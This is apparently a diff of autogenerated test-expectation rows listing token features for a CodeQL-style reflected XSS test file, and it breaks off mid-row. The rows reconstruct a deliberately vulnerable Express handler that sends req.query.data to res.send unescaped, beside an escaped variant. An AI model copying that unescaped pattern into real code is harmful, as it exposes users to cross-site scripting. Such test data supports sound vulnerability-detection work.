autogenerated/Xss/ReflectedXss/promises.js:6:11:6:10 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:10 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:10 | res | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:10 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:10 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:11 | x | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | 'arguments' object of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | exceptional return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | exceptional return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | x => res.send(x) | CalleeFlexibleAccessPath | Promise().then | | autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | x => res.send(x) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | x => res.send(x) | contextFunctionInterfaces | | @@ -21845,6 +145461,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | x => res.send(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | | autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | x => res.send(x) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/promises.js:6:11:6:26 | x => res.send(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:18 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:18 | res | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:18 | res | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:18 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:18 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:23 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:23 | res.send | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:23 | res.send | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:23 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:23 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | exceptional return of res.send(x) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | exceptional return of res.send(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | exceptional return of res.send(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | exceptional return of res.send(x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | exceptional return of res.send(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | res.send(x) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | res.send(x) | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | res.send(x) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | res.send(x) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:16:6:26 | res.send(x) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:6:20:6:23 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:6:20:6:23 | send | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:6:20:6:23 | send | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:6:20:6:23 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:6:20:6:23 | send | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:6:25:6:25 | x | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/promises.js:6:25:6:25 | x | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:6:25:6:25 | x | contextFunctionInterfaces | | @@ -21853,6 +145494,118 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:6:25:6:25 | x | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/promises.js:6:25:6:25 | x | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:6:25:6:25 | x | receiverName | res | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | exceptional return of new Pro ... .data)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | exceptional return of new Pro ... .data)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | exceptional return of new Pro ... .data)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | exceptional return of new Pro ... .data)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | exceptional return of new Pro ... .data)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | new Pro ... .data)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | new Pro ... .data)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | new Pro ... .data)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | new Pro ... .data)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:8:59 | new Pro ... .data)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:9 | new Pro ... .then | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:9 | new Pro ... .then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:9 | new Pro ... .then | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:9 | new Pro ... .then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:9 | new Pro ... .then | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | exceptional return of new Pro ... tml(x)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | exceptional return of new Pro ... tml(x)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | exceptional return of new Pro ... tml(x)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | exceptional return of new Pro ... tml(x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | exceptional return of new Pro ... tml(x)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | new Pro ... tml(x)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | new Pro ... tml(x)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | new Pro ... tml(x)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | new Pro ... tml(x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:9:29 | new Pro ... tml(x)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:9 | new Pro ... .then | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:9 | new Pro ... .then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:9 | new Pro ... .then | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:9 | new Pro ... .then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:9 | new Pro ... .then | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | exceptional return of new Pro ... end(x)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | exceptional return of new Pro ... end(x)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | exceptional return of new Pro ... end(x)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | exceptional return of new Pro ... end(x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | exceptional return of new Pro ... end(x)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | new Pro ... end(x)) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | new Pro ... end(x)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | new Pro ... end(x)) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | new Pro ... end(x)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:3:10:27 | new Pro ... end(x)) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:7:8:13 | Promise | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:7:8:13 | Promise | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:8:7:8:13 | Promise | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:7:8:13 | Promise | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:7:8:13 | Promise | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:14 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:14 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:14 | req | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:14 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | 'arguments' object of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | (resolv ... y.data) | CalleeFlexibleAccessPath | Promise | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | (resolv ... y.data) | InputArgumentIndex | 0 | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | (resolv ... y.data) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | (resolv ... y.data) | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | (resolv ... y.data) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | (resolv ... y.data) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | (resolv ... y.data) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | exceptional return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | exceptional return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:15:8:58 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:16:8:22 | resolve | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:25:8:30 | reject | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:25:8:30 | reject | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:25:8:30 | reject | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:25:8:30 | reject | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:25:8:30 | reject | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:42 | resolve | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:42 | resolve | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:42 | resolve | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:42 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:42 | resolve | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | exceptional return of resolve ... y.data) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | exceptional return of resolve ... y.data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | exceptional return of resolve ... y.data) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | exceptional return of resolve ... y.data) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | exceptional return of resolve ... y.data) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | resolve ... y.data) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | resolve ... y.data) | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | resolve ... y.data) | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | resolve ... y.data) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:36:8:58 | resolve ... y.data) | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:46 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:46 | req | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:46 | req | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:46 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:46 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:52 | req.query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:52 | req.query | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:52 | req.query | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:52 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:44:8:52 | req.query | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:8:44:8:57 | req.query.data | CalleeFlexibleAccessPath | resolve | | autogenerated/Xss/ReflectedXss/promises.js:8:44:8:57 | req.query.data | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:8:44:8:57 | req.query.data | contextFunctionInterfaces | | @@ -21860,6 +145613,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/promises.js:8:44:8:57 | req.query.data | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | | autogenerated/Xss/ReflectedXss/promises.js:8:44:8:57 | req.query.data | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/promises.js:8:44:8:57 | req.query.data | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:48:8:52 | query | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:48:8:52 | query | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:48:8:52 | query | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:48:8:52 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:48:8:52 | query | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:8:54:8:57 | data | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:8:54:8:57 | data | contextSurroundingFunctionParameters | (req, res)\n(resolve, reject) | +| autogenerated/Xss/ReflectedXss/promises.js:8:54:8:57 | data | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:8:54:8:57 | data | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:8:54:8:57 | data | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:6:9:9 | then | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:6:9:9 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/promises.js:9:6:9:9 | then | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:6:9:9 | then | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:6:9:9 | then | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:11 | x | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | 'arguments' object of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | exceptional return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | exceptional return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | return of anonymous function | enclosingFunctionBody | req res Promise resolve reject resolve req query data then x res send x Promise resolve reject resolve req query data then x escapeHtml x then x res send x | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | x => escapeHtml(x) | CalleeFlexibleAccessPath | Promise().then | | autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | x => escapeHtml(x) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/promises.js:9:11:9:28 | x => escapeHtml(x) | 